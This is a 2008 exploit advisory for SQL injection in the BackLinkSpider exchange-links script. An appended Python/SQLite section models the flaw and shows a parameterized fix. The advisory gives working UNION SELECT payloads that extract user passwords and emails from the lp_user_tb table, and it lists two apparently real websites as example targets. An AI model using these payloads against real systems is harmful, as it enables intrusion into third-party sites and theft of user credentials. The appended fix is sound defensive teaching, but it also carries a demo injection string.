The BackLinkSpider Exchange Links script suffers from remote SQL injection vulnerabilities in links.asp and links.php.
[~]-----------------------------------------------------------------------------------------------------------------------------------------------------
[~]
[~] BackLinkSpider - Exchange links Script (links.asp?cat_id) and (links.php?cat_id) Remote SQL Injection Vulnerability
[~]
[~] http://www.backlinkspider.com
[~]
[~]
[~]
[~]-----------------------------------------------------------------------------------------------------------------------------------------------------
[~] Bug found by d3v1l [Avram Marius]
[~]
[~] Date: 20.11.2008
[~]
[~]
[~] d3v1l@spoofer.com http://security-sh3ll.com
[~]
[~]
[~]-----------------------------------------------------------------------------------------------------------------------------------------------------
[~] Greetz tO ALL:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~]
[~] milw0rm <-> packetstorm Staff
[~]-----------------------------------------------------------------------------------------------------------------------------------------------------
[~] Exploit :-
[~]
[~] http://site.com/links.php?cat_id=-1 UNION SELECT 1,2,3,4,5,6,concat(password,0x3a,email),8,9,10,11,12,13,14,15,16,17,18,19,20 from lp_user_tb--
[~] -1 UNION SELECT 1,2,3,4,5,6,concat(fname,0x3a,password,0x3a,email),8,9,10,11,12,13,14,15,16,17,18,19,20 from lp_user_tb--
[~]
[~]------------------------------------------------------------------------------------------------------------------------------------------------------
[~]
[~] Example :-
[~]
[~] links.asp?cat_id= -> http://www.champagneandchocolates.com/links.asp?cat_id=SQL
[~]
[~]
[~] links.php?cat_id= -> http://www.quad-center.it/links.php?cat_id==SQL
[~]
[~]
[~]-------------------------------------------------------------------------------------------------------------------------------------------------------
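
Added example (not part of the original advisory and not BackLinkSpider's own code): a Python/SQLite model of the cat_id flaw, with the concatenated query beside a validated, parameterized one. The links table, its columns, the function names and the sample rows are assumptions; only lp_user_tb and its fname, password and email columns come from the advisory.

```python
import sqlite3

def make_db():
    # Constructed demo data. lp_user_tb is the table named in the advisory;
    # the links table and its columns are assumptions for illustration.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE links (id INTEGER, cat_id INTEGER, title TEXT);
        CREATE TABLE lp_user_tb (fname TEXT, password TEXT, email TEXT);
        INSERT INTO links VALUES (1, 7, 'Example partner');
        INSERT INTO lp_user_tb VALUES ('alice', 'demo-hash', 'alice@example.test');
    """)
    return conn

# Constructed request value shaped like the advisory's, cut down to the
# three columns of the demo links table and written in SQLite syntax.
INJECTED = "-1 UNION SELECT 1,2,password || ':' || email FROM lp_user_tb--"

def links_vulnerable(conn, cat_id):
    # Before: the raw parameter becomes part of the SQL text, so its
    # contents are parsed as SQL rather than compared as a value.
    sql = "SELECT id, cat_id, title FROM links WHERE cat_id = " + cat_id
    return conn.execute(sql).fetchall()

def parse_cat_id(raw):
    # Allow-list check: ASCII digits only, bounded length.
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 9):
        raise ValueError("cat_id must be a non-negative integer")
    return int(raw)

def links_hardened(conn, raw_cat_id):
    # After: validate the type, then bind the value as a parameter so it
    # can never change the structure of the statement.
    cat_id = parse_cat_id(raw_cat_id)
    sql = "SELECT id, cat_id, title FROM links WHERE cat_id = ?"
    return conn.execute(sql, (cat_id,)).fetchall()
```

The same two steps (integer validation, then a bound parameter) apply to both links.php and links.asp, whatever database driver each uses.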